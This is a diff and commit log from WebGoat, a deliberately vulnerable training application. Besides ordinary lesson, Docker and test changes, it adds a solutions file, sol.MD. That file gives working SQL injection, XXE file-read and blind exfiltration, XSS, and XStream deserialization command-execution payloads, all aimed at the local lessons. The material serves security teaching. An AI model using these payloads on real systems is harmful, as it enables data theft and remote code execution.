--- a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/plugin/CSRFLogin.java
+++ b/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/plugin/CSRFLogin.java
@ -33,7 +33,7 @@ public class CSRFLogin extends AssignmentEndpoint {
    }
    private void markAssignmentSolvedWithRealUser(String username) {
-        UserTracker userTracker = userTrackerRepository.findOne(username);
+        UserTracker userTracker = userTrackerRepository.findByUser(username);
        userTracker.assignmentSolved(getWebSession().getCurrentLesson(), this.getClass().getSimpleName());
        userTrackerRepository.save(userTracker);
    }
--- a/webgoat-lessons/http-basics/src/main/resources/lessonPlans/en/HttpBasics_content1.adoc
+++ b/webgoat-lessons/http-basics/src/main/resources/lessonPlans/en/HttpBasics_content1.adoc
@ -1,8 +1,8 @@
-Enter your name in the input field below and press "Go!" to submit.	The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP	request. 
+Enter your name in the input field below and press "Go!" to submit.	The server will accept the request, reverse the
-
+input and display it back to the user, illustrating the basics of handling an HTTP request.
 The user should become familiar with the features of WebGoat by manipulating the above buttons to view hints, show the HTTP request parameters, the HTTP request cookies, and the Java source code. You may also try using OWASP ZAP Attack Proxy to see the HTTP data.
 == Try It!
-Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP request.
+Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the input
 and display it back to the user, illustrating the basics of handling an HTTP request.
--- a/webgoat-lessons/sol.MD
+++ b/webgoat-lessons/sol.MD
@ -0,0 +1,111 @@
 ### SQLi ###  
 Basic  
 Smith - to show it returns smith's records.    
 To show exploit; `1=1` can be any true clause:  
 ```sql  
 Smith' or '1'='1   
 ```
 **Bender Login**  
 ```sql
 bender@juice-sh.op' --  
 ```
 ```sql 
 [2:19 PM]  
 101
 101 or 1=1
 ```  
 ```sql 
 Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
 ```  
 ## XXE ##
 Simple:  
 ```xml 
 <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment>  
 ```
 Modern Rest Framework:  
 Change content type to: `Content-Type: application/xml` and 
 ```xml  
 <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user>  <username>&root;</username><password>test</password></user>
 ```  
 Blind SendFile   
 ```xml
      Solution:
      Create DTD:
      <pre>
          <?xml version="1.0" encoding="UTF-8"?>
          <!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
          <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=%file;'>">
           %all;
      </pre>
      This will be reduced to:
      <pre>
          <!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]'>
      </pre>
      Wire it all up in the xml send to the server:
      <pre>
       <?xml version="1.0"?>
       <!DOCTYPE root [
       <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
       %remote;
        ]>
       <user>
         <username>test&send;</username>
       </user>
      </pre>
 ```
 ### XSS ###
 ```javascript
 <script>alert('my javascript here')</script>4128 3214 0002 1999
 ``` 
 DOM-XSS:  
  Something like 
  `http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
 //`   
 OR  
 `http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>`  
 ### Vuln - Components ###
 Jquery page: - it is contrived; but paste that in each box  
 ```javascript
 OK<script>alert("XSS")<\/script>
 OK<script>alert("XSS")<\/script>
 ```
 for the deserialization:  got to the link: http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/  to read about why it works so you can talk to it.
 ```html  
 <sorted-set>  
 <string>foo</string>
 <dynamic-proxy>
   <interface>java.lang.Comparable</interface>
   <handler class="java.beans.EventHandler">
     <target class="java.lang.ProcessBuilder">
       <command>
         <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
       </command>
     </target>
     <action>start</action>
   </handler>
 </dynamic-proxy>
 </sorted-set>
 ```
--- a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content6.adoc
+++ b/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content6.adoc
@ -1,15 +1,29 @@
 == Special Characters
 [source]
 ----
 /* */ 	 are inline comments
 -- , # 	 are line comments
 'Select * from users where name = ‘admin’--and pass = ‘pass’'
 Example: Select * from users where name = 'admin' --and pass = 'pass'
 ----
 [source]
 ----
 ;        allows query chaining
 'Select * from users; drop table users;'
-’,+,||	allows string concatenation 
+Example: Select * from users; drop table users;
 ----
 [source]
 ----
 ',+,||	 allows string concatenation
 Char()	 strings without quotes
-'Select * from users where name = ‘+char(27) or 1=1'
+
 Example: Select * from users where name = '+char(27) or 1=1
 ----
 ==  Special Statements
--- a/webgoat-lessons/webgoat-lesson-template/getting-started.MD
+++ b/webgoat-lessons/webgoat-lesson-template/getting-started.MD
@ -0,0 +1,70 @@
 ### To include lesson template in build ###
 1. Edit the webgoat-server/pom.xml file and uncomment the section under  
  ```xml  
   <!--uncommment below to run/include lesson template in WebGoat Build-->  
  ```
 2. Also uncomment in webgoat-lessons/pom.xml where it says    
  ```xml  
   <!-- uncomment below to include lesson template in build, also uncomment the dependency in webgoat-server/pom.xml-->
  ```  
 ### To add a lesson to WebGoat ###
 There are a number of moving parts and this sample lesson will help you navigate those parts. Most of your work will be done in two directories. To start though, you can copy this directory with the name of your-lesson in the webgoat-lessons directory.
 0. The POM file  
    *  Change the line to give your lesson its own artifactId.   
        That should be all you need to do there:  
 	```xml  
 	 <artifactId>webgoat-lesson-template</artifactId>  
 	```  
 1. The Base Class  
    *  The name of the class (file and class name) to better match your lesson. (e.g. `sql-injection` >> `SqlInjection`)  
    *  The category in which you want your lesson to be in. You can create a new category if you want, or put in an issue to have one added.  
    * The `defaultRanking` will move your lesson up or down in the categories list.  
    * Implement a new key name pair `lesson-template.title` (the key) and update the same key/value pair `your.key=your value` in src/main/resources/i18n/WebGoatLabels.properties.  
    * Implement a new value for the `getId` method, which leads us to...  
 2. The HTML content framing  
    * Rename the provided file in src/main/resources/html using your value from the `getId` method in your lesson's base class:  
 	e.g.   
 	`public String getId() { return "your-lesson";  }` >> `your-lesson.html`   
    * Modify that file following the commented instructions in there.   
    * In conjunction with this file you.  
 3. Assignment Endpoints    
    * In the above html file, you will see an example of an 'attack form'. You can create endpoints to handle these attacks and provide the user feedback and simulated output. See the example file here as well as other existing lessons for ways to extend these.  You will extend the `AssignmentEndpoint` as the example will show:  
    * You can also create supporting (non-assignment) endpoints, that are not evaluated/graded.  
    * See other lesson examples for creating unit/integration tests for your project as well.
 4. Getting your lesson to show up  
    * Modify the webgoat-lessons/pom.xml to include your project in the `<modules>` section:  
        ```xml
 	  <modules>
 	             <!-- ... -->
 	     <module>webgoat-lesson-template</module>
 		     <!-- ... -->
 	  </modules>
        ```
    * Modify the webgoat-server/pom.xml to add your project as a dependency in the `<dependencies>` section:   
       ```xml
         <dependencies>
 	             <!-- .... >
           <dependency>
              <groupId>org.owasp.webgoat.lesson</groupId>
              <artifactId>your-artfifact-id-here</artifactId>
              <version>${project.version}</version>
           </dependency>
                     <!-- .... >
        </dependencies>
    ```
 5. You should be ready to run and test your project. Please create issues at https://github.com/WebGoat/WebGoat if there errors or confusion with this documentation/template
--- a/webgoat-lessons/webgoat-lesson-template/getting-started.txt
+++ b/webgoat-lessons/webgoat-lesson-template/getting-started.txt
@ -1,55 +0,0 @@
 ##### To include lesson template in build #####
 1. edit theh webgoat-server/pom.xml file and uncomment the section under ...
 <!--uncommment below to run/include lesson template in WebGoat Build-->
 2. Also uncomment in webgoat-lessons/pom.xml where it says ...
 <!-- uncomment below to include lesson template in build, also uncomment the dependency in webgoat-server/pom.xml-->
 ##### To add a lesson to WebGoat #####
 There are a number of moving parts and this sample lesson will help you navigate those parts. Most of your work will be done in two directories. To start though, you can copy this directory with the name of your-lesson in the webgoat-lessons directory.
 0. The POM file
 	a. change the ...
 	<artifactId>webgoat-lesson-template</artifactId>
 	... line to give your lesson its own artifactId.That should be all you need to do there
 1.	The Base Class ...
        a. The name of the class (file and class name) to better match your lesson (e.g. sql-injection >> SqlInjection)
        b. the category in which you want your lesson to be in.  You can create a new category if you want, or put in an issue to have one added
        c. The 'defaultRanking' will move your lesson up or down in the categories list
        d. implement a new key name pair "lesson-template.title" (the key) and update the same key/value pair (your.key=your value) in src/main/resources/i18n/WebGoatLabels.properties
        e. Implement a new value for the getId method, which leads us to ...
 2. The HTML content framing ...
 	a. Rename the provided file in src/main/resources/html using your value from the getId method in your lesson's base class (e.g. public String getId() { return "your-lesson";  } >> "your-lesson.html")
 	b. Modify that file following the commented instructions in there
 	c. In conjunction with this file you
 3. Assignment Endpoints
 	a. In the above html file, you will see an example of an 'attack form'.  You can create endpoints to handle these attacks and provide the user feedback and simulated output.  See the example file here as well as other existing lessons for ways to extend these.  You will extend the AssignmentEndpoint as the example will show
 	b. You can also create supporting (non-assignment) endpoints, that are not evaluated/graded.  
 	c. See other lesson examples for creating unit/integration tests for your project as well
 4. Getting your lesson to show up
 	a. modify the webgoat-lessons/pom.xml to include your project in the <modules> section
 	<modules>
 		<!-- ... -->
 		<module>webgoat-lesson-template</module>
 		<!-- ... -->
 	</modules>
 	b. modify the webgoat-server/pom.xml to add your project as a dependency in the <dependencies> section ...
 	<dependencies>
 		<!-- .... >
        <dependency>
            <groupId>org.owasp.webgoat.lesson</groupId>
            <artifactId>your-artfifact-id-here</artifactId>
            <version>${project.version}</version>
        </dependency>
        <!-- .... >
    <dependencies>
 5. You should be ready to run and test your project. Please create issues at https://github.com/WebGoat/WebGoat if there errors or confusion with this documentation/template
--- a/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/plugin/WebWolfIntroduction.java
+++ b/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/plugin/WebWolfIntroduction.java
@ -48,7 +48,7 @@ public class WebWolfIntroduction extends NewLesson {
    @Override
    public Integer getDefaultRanking() {
-        return 1;
+        return 10;
    }
    @Override
--- a/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc
+++ b/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc
@ -27,5 +27,5 @@ docker pull webwolf/webwolf-8.0
 docker run -it 8081:8081 /home/webwolf/run.sh
 ```
-This will start the application on port 8081, in your browser type: `http://localhost:8081/WebWolf`
+This will start the application on port 8081, click webWolfLink:here[] to open WebWolf.
-You will be redirected to the login page where you need to login with your WebGoat username and password
+First thing you need to do is register a new user within WebWolf.
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java
@ -46,7 +46,7 @@ import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
@AssignmentHints({"xxe.hints.content.type.xxe.1", "xxe.hints.content.type.xxe.2"})
 public class ContentTypeAssignment extends AssignmentEndpoint {
-    private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "opt", "var"};
+    private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"}; 
    private final static String[] DEFAULT_WINDOWS_DIRECTORIES = {"Windows", "Program Files (x86)", "Program Files"};
@ -85,7 +85,7 @@ public class ContentTypeAssignment extends AssignmentEndpoint {
    }
   private boolean checkSolution(Comment comment) {
-        String[] directoriesToCheck = OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
+       String[] directoriesToCheck = OS.isFamilyMac() || OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
       boolean success = true;
       for (String directory : directoriesToCheck) {
           success &= org.apache.commons.lang3.StringUtils.contains(comment.getText(), directory);
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/SimpleXXE.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/SimpleXXE.java
@ -54,7 +54,7 @@ import static org.springframework.web.bind.annotation.RequestMethod.POST;
@AssignmentHints({"xxe.hints.simple.xxe.1", "xxe.hints.simple.xxe.2", "xxe.hints.simple.xxe.3", "xxe.hints.simple.xxe.4"})
 public class SimpleXXE extends AssignmentEndpoint {
-    private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "opt", "var"};
+    private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};
    private final static String[] DEFAULT_WINDOWS_DIRECTORIES = {"Windows", "Program Files (x86)", "Program Files"};
    @Value("${webgoat.server.directory}")
@ -77,12 +77,11 @@ public class SimpleXXE extends AssignmentEndpoint {
        }
        return trackProgress(failed().output(error).build());
    }
    private boolean checkSolution(Comment comment) {
-        String[] directoriesToCheck = OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
+       String[] directoriesToCheck = OS.isFamilyMac() || OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
       boolean success = true;
       for (String directory : directoriesToCheck) {
-            success &= comment.getText().contains(directory);
+           success &= org.apache.commons.lang3.StringUtils.contains(comment.getText(), directory);
       }
       return success;
   } 
--- a/webgoat-server/Dockerfile
+++ b/webgoat-server/Dockerfile
@ -2,13 +2,14 @@ FROM openjdk:8-jre-slim
 ARG webgoat_version=8.0-SNAPSHOT
-RUN useradd --home-dir /home/webgoat --create-home -U webgoat
+RUN \
-
+  apt-get update && apt-get install && \
-RUN apt-get update; apt-get install curl -y
+  useradd --home-dir /home/webgoat --create-home -U webgoat && \
-
+  cd /home/webgoat/; mkdir -p .webgoat
 COPY start.sh /home/webgoat/start.sh
 RUN chmod +x /home/webgoat/start.sh
 USER webgoat
 RUN cd /home/webgoat/; mkdir -p .webgoat
 COPY target/webgoat-server-${webgoat_version}.jar /home/webgoat/webgoat.jar
 ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webgoat/webgoat.jar", "--server.address=0.0.0.0"]
 EXPOSE 8080
--- a/webgoat-server/start.sh
+++ b/webgoat-server/start.sh
@ -1,3 +0,0 @@
 #!/bin/sh
 java -jar -Djava.security.egd=file:/dev/./urandom /home/webgoat/webgoat.jar
--- a/webgoat_developer_bootstrap.sh
+++ b/webgoat_developer_bootstrap.sh
@ -1,146 +0,0 @@
 #!/bin/bash
 # Bootstrap the setup of WebGoat for developer use in Linux and Mac machines
 # This script will clone the necessary git repositories, call the maven goals
 # in the order the are needed and launch tomcat listening on localhost:8080
 # Happy hacking !
 # Find out what is our terminal size
 COLS="$(tput cols)"
 if (( COLS <= 0 )) ; then
    COLS="${COLUMNS:-80}"
 fi
 # Colors
 ESC_SEQ="\x1b["
 COL_RESET=$ESC_SEQ"39;49;00m"
 COL_RED=$ESC_SEQ"31;01m"
 COL_GREEN=$ESC_SEQ"32;01m"
 COL_YELLOW=$ESC_SEQ"33;01m"
 COL_BLUE=$ESC_SEQ"34;01m"
 COL_MAGENTA=$ESC_SEQ"35;01m"
 COL_CYAN=$ESC_SEQ"36;01m"
 # Horizontal Rule function
 horizontal_rule() {
    local WORD
    for WORD in "#"
    do
        hr "$WORD"
    done
 }
 hr() {
    local WORD="$1"
    if [[ -n "$WORD" ]] ; then
        local LINE=''
        while (( ${#LINE} < COLS ))
        do
            LINE="$LINE$WORD"
        done
        echo -e "${LINE:0:$COLS}"
    fi
 }
 ## test if command exists
 ftest() {
  echo -e "$COL_CYAN  info: Checking if ${1} is installed $COL_RESET"
  if ! type "${1}" > /dev/null 2>&1; then
    return 1
  else
    return 0
  fi
 }
 ## feature tests
 features() {
  for f in "${@}"; do
    ftest "${f}" || {
      echo -e >&2 "***$COL_RED ERROR: Missing \`${f}'! Make sure it exists and try again. $COL_RESET"
      return 1
    }
  done
  return 0
 }
 tomcat_started () {
    STAT=`netstat -na | grep 8080 | awk '{print $6}'`
    if [ "$STAT" = "LISTEN" ]; then
        echo -e "$COL_GREEN WebGoat has started successfully! Browse to the following address. $COL_RESET"
        echo -e "$COL_CYAN Happy Hacking! $COL_RESET"
        return 0
    elif [ "$STAT" = "" ]; then
        echo -e "$COL_RED WebGoat failed to start up.... please wait run the following command for debugging : $COL_RESET"
        echo -e "$COL_MAGENTA  mvn -q -file WebGoat/pom.xml -pl webgoat-container tomcat7:run-war"
    fi
    return 1
 }
 ## main setup
 developer_bootstrap() {
    horizontal_rule
    echo -e "$COL_RED
    ██╗    ██╗███████╗██████╗  ██████╗  ██████╗  █████╗ ████████╗
    ██║    ██║██╔════╝██╔══██╗██╔════╝ ██╔═══██╗██╔══██╗╚══██╔══╝
    ██║ █╗ ██║█████╗  ██████╔╝██║  ███╗██║   ██║███████║   ██║
    ██║███╗██║██╔══╝  ██╔══██╗██║   ██║██║   ██║██╔══██║   ██║
    ╚███╔███╔╝███████╗██████╔╝╚██████╔╝╚██████╔╝██║  ██║   ██║
     ╚══╝╚══╝ ╚══════╝╚═════╝  ╚═════╝  ╚═════╝ ╚═╝  ╚═╝   ╚═╝
    $COL_RESET"
    horizontal_rule
    echo -e "Welcome to the WebGoat Developer Bootstrap script for Linux/Mac."
    echo -e "Now checking if all the required software to run WebGoat is already installed."
    echo -e "FYI: This Developer Bootstrap Script for WebGoat requires: Git, Java JDK and Maven accessible on the path"
    ## test for require features
    features git mvn java || return $?
    # Clone WebGoat from github
    if [ ! -d "WebGoat" ]; then
        echo -e "Cloning the WebGoat container repository"
        git clone https://github.com/WebGoat/WebGoat.git
    else
        horizontal_rule
        (
            echo -e "$COL_YELLOW The WebGoat container repo has already been clonned before, pulling upstream changes. $COL_RESET"
            cd WebGoat || {
                echo -e >&2 "$COL_RED *** ERROR: Could not cd into the WebGoat Directory. $COL_RESET"
                return 1
            }
            git pull origin develop
        )
    fi
    # Start the embedded Tomcat server
    echo -e "$COL_MAGENTA"
    horizontal_rule
    horizontal_rule
    horizontal_rule
    horizontal_rule
    echo "$COL_MAGENTA"
    echo "$COL_CYAN ***** Starting WebGoat using the embedded Tomcat ***** $COL_RESET"
    echo " Please be patient.... The startup of the server takes about 5 seconds..."
    echo " WebGoat will be ready for you when you see the following message on the command prompt:"
    echo "$COL_YELLOW INFO: Starting ProtocolHandler ["http-bio-8080"] $COL_RESET"
    echo "$COL_CYAN When you see the message above, open a web browser and navigate to http://localhost:8080/WebGoat/ $COL_RESET"
    echo " To stop the WebGoat and Tomcat Execution execution, press CTRL + C"
    echo "$COL_RED If you close this terminal window, Tomcat and WebGoat will stop running $COL_RESET"
    echo "$COL_MAGENTA"
    horizontal_rule
    horizontal_rule
    horizontal_rule
    horizontal_rule
    echo -e "$COL_RESET"
    sleep 5
    # Starting WebGoat
    mvn -q -pl webgoat-server spring-boot:run
 }
 # Start main script
 developer_bootstrap
--- a/webwolf/Dockerfile
+++ b/webwolf/Dockerfile
@ -2,12 +2,13 @@ FROM openjdk:8-jre-slim
 ARG webwolf_version=8.0-SNAPSHOT
-RUN useradd --home-dir /home/webwolf --create-home -U webwolf
+RUN \
-
+  apt-get update && apt-get install && \
-RUN apt-get update; apt-get install curl -y
+  useradd --home-dir /home/webwolf --create-home -U webwolf
 COPY start.sh /home/webwolf/start.sh
 RUN chmod +x /home/webwolf/start.sh
 USER webwolf
 COPY target/webwolf-${webwolf_version}.jar /home/webwolf/webwolf.jar
 ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webwolf/webwolf.jar", "--server.address=0.0.0.0"]
 EXPOSE 8081
--- a/webwolf/pom.xml
+++ b/webwolf/pom.xml
@ -78,6 +78,13 @@
            <artifactId>hsqldb</artifactId>
            <version>${hsqldb.version}</version>
        </dependency>
        <!-- ************* START: Dependencies for Unit and Integration Testing ************** -->
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>
    </dependencies>
    <build>
--- a/webwolf/src/main/java/org/owasp/webwolf/mailbox/Email.java
+++ b/webwolf/src/main/java/org/owasp/webwolf/mailbox/Email.java
@ -1,12 +1,9 @@
 package org.owasp.webwolf.mailbox;
 import lombok.AllArgsConstructor;
 import lombok.Builder;
 import lombok.Data;
 import lombok.NoArgsConstructor;
-import javax.persistence.Entity;
+import javax.persistence.*;
 import javax.persistence.Id;
 import java.io.Serializable;
 import java.time.LocalDateTime;
 import java.time.format.DateTimeFormatter;
@ -15,16 +12,16 @@ import java.time.format.DateTimeFormatter;
 * @author nbaars
 * @since 8/20/17.
 */
@Builder
@Data
@Entity
@NoArgsConstructor
@AllArgsConstructor
 public class Email implements Serializable {
    @Id
-    private String id;
+    @GeneratedValue(strategy = GenerationType.IDENTITY)
    private Long id;
    private LocalDateTime time;
    @Column(length = 1024)
    private String contents;
    private String sender;
    private String title;
@ -45,4 +42,5 @@ public class Email implements Serializable {
    public String getShortSender() {
        return sender.substring(0, sender.indexOf("@"));
    }
 }
--- a/webwolf/src/main/resources/application.properties
+++ b/webwolf/src/main/resources/application.properties
@ -3,6 +3,7 @@ server.error.path=/error.html
 server.session.timeout=6000
 #server.contextPath=/WebWolf
 server.port=8081
 server.address=127.0.0.1
 server.session.cookie.name = WEBWOLFSESSION
 spring.datasource.url=jdbc:hsqldb:file:${webgoat.server.directory}/data/webwolf
@ -29,7 +30,8 @@ multipart.location=${java.io.tmpdir}
 multipart.max-file-size=1Mb
 multipart.max-request-size=1Mb
-webgoat.server.directory=${user.home}/.webgoat/
+webgoat.build.version=@project.version@
 webgoat.server.directory=${user.home}/.webgoat-${webgoat.build.version}/
 webwolf.fileserver.location=${java.io.tmpdir}/webwolf-fileserver
 spring.jackson.serialization.indent_output=true
--- a/webwolf/src/test/java/org/owasp/webwolf/mailbox/MailboxRepositoryTest.java
+++ b/webwolf/src/test/java/org/owasp/webwolf/mailbox/MailboxRepositoryTest.java
@ -0,0 +1,49 @@
 package org.owasp.webwolf.mailbox;
 import org.hamcrest.CoreMatchers;
 import org.junit.Test;
 import org.junit.runner.RunWith;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.boot.test.autoconfigure.orm.jpa.DataJpaTest;
 import org.springframework.test.context.junit4.SpringRunner;
 import java.time.LocalDateTime;
 import java.util.List;
 import static org.junit.Assert.*;
@DataJpaTest
@RunWith(SpringRunner.class)
 public class MailboxRepositoryTest {
    @Autowired
    private MailboxRepository mailboxRepository;
    @Test
    public void emailShouldBeSaved() {
        Email email = new Email();
        email.setTime(LocalDateTime.now());
        email.setTitle("test");
        email.setSender("test@test.com");
        email.setContents("test");
        email.setRecipient("someone@webwolf.org");
        mailboxRepository.save(email);
    }
    @Test
    public void savedEmailShouldBeFoundByReceipient() {
        Email email = new Email();
        email.setTime(LocalDateTime.now());
        email.setTitle("test");
        email.setSender("test@test.com");
        email.setContents("test");
        email.setRecipient("someone@webwolf.org");
        mailboxRepository.saveAndFlush(email);
        List<Email> emails = mailboxRepository.findByRecipientOrderByTimeDesc("someone@webwolf.org");
        assertThat(emails.size(), CoreMatchers.is(1));
    }
 }
--- a/webwolf/start.sh
+++ b/webwolf/start.sh
@ -1,3 +0,0 @@
 #!/bin/sh
 java -jar -Djava.security.egd=file:/dev/./urandom /home/webwolf/webwolf.jar
Author	SHA1	Message	Date
nbaars	2ae1b4955f	By default binds to ALL network interfaces #431 Fix for Docker not binding to any address by default	2018-01-30 07:18:05 +01:00
nbaars	13a4b69cbe	All lesson flags are displayed while running webgoat 8.0 standalone java file #430	2018-01-29 15:43:19 +01:00
nbaars	98efc1235f	By default binds to ALL network interfaces #431	2018-01-29 15:32:02 +01:00
nbaars	b99b554522	Version: docker 8.0.0.M9 Multiple users can't finalize the same lesson #432	2018-01-29 15:29:48 +01:00
nbaars	04ccf9a422	New release should create a new webgoat directory with version tag inside #423	2018-01-21 17:46:43 +01:00
nbaars	ee11381a63	Fixed database issue mappings	2018-01-21 17:13:28 +01:00
nbaars	2cc6c232e2	Added macro for asciidoc to produce the WebWolf link dynamically depending on configuration	2018-01-15 20:56:59 +01:00
nbaars	dec55d52ca	Replaced quotes with normal character (Version: 8.0.0.M5 Character Encoding Issues #411 )	2018-01-14 13:22:28 +01:00
Noah Hansen	568fa82270	fixed ContentTypeAssignment and SimpleXXE to work with MacOSX	2018-01-13 16:00:11 +00:00
Jason Hilton	bad60c43c0	vagrant-training is where the vagrant file is	2018-01-13 15:55:42 +00:00
nbaars	a6b9235711	SQL Error '-104' in XSS Lesson Page 7 #416	2018-01-10 12:48:45 +01:00
nbaars	253a2f16ed	Unable to see buttons like HTTP request parameters, the HTTP request cookies, and the Java source code #417	2018-01-10 12:04:28 +01:00
nbaars	e801b0917d	Unable to save email send to WebWolf #419	2018-01-10 09:19:20 +01:00
nbaars	ae92ac6808	Changed the Vagrantfile to contain the correct release name Deleted the Vagrant files for setting up dev environment, today it is easy to setup the dev environment yourself to start working.	2018-01-09 12:42:57 +01:00
nbaars	a9ac00a075	Clean up	2018-01-08 23:42:36 +01:00
Nanne Baars	0120c7c3a6	Updating README.md	2018-01-02 22:50:10 +01:00
nbaars	5bbdb8893c	Not making a Docker release is we build develop (putting a tag will create a release which is more a controlled/intuitive way to make a release to Docker) (cherry picked from commit `e3e7ed0`)	2018-01-02 22:20:38 +01:00
nbaars	05d8b590f3	Merge tag '8.0.0' into develop Release 8.0.0	2017-12-30 16:52:24 +01:00
nbaars	114fbc5760	Merge branch 'release/8.0.0'	2017-12-30 16:50:39 +01:00
nbaars	32311a80da	Updating readme	2017-12-30 16:25:10 +01:00
nbaars	d3ee9431d8	Tagging latest Docker build with Travis as well	2017-12-30 14:13:34 +01:00
Magicansk	a11e6911cd	Update and rename sol.txt to sol.MD Add md syntax	2017-11-02 13:09:49 +01:00
Magicansk	5614cda0bf	Update getting-started.MD	2017-11-02 13:09:23 +01:00
Magicansk	69d44aed5b	Update and rename getting-started.txt to getting-started.MD Change .txt to .md. Add all the markdown syntax and fixed the xml syntax	2017-11-02 13:09:23 +01:00
misfir3	f6911b49a7	Merge pull request #402 from misfir3/develop more hints/helps cleanup	2017-10-30 09:03:03 -06:00
Jason	24cf806787	more hints/helps cleanup	2017-10-25 18:05:08 -06:00
misfir3	1ac305e9b9	Merge pull request #399 from misfir3/develop #351 - using listenToOnce to get rid of redundant calls	2017-10-25 17:13:11 -06:00
Jason	c6f1c5cd2a	#351 - using listenToOnce to get rid of redundant calls	2017-10-25 17:11:54 -06:00
Magicansk	74218de135	Update README.MD	2017-10-25 21:43:58 +02:00
Sönke	1f6d7fdc39	Update Java Version Solves #385	2017-10-23 23:36:35 +02:00
Sönke	cce1945f23	Fix Apt Error for Google Repository See https://askubuntu.com/questions/724093/no-more-updates-for-google-chrome-apt-get-update-error	2017-10-23 23:35:40 +02:00
Nanne Baars	45d48a8776	Update README.MD	2016-12-23 15:58:09 +01:00
Doug Morato	50904cf69b	Adding Changelog Adding Changelog file for WebGoat releases Signed-off-by: Doug Morato <dm@corp.io>	2016-11-18 21:32:41 -05:00
		`@ -1,3 +0,0 @@`
			`#!/bin/sh`

			`java -jar -Djava.security.egd=file:/dev/./urandom /home/webgoat/webgoat.jar`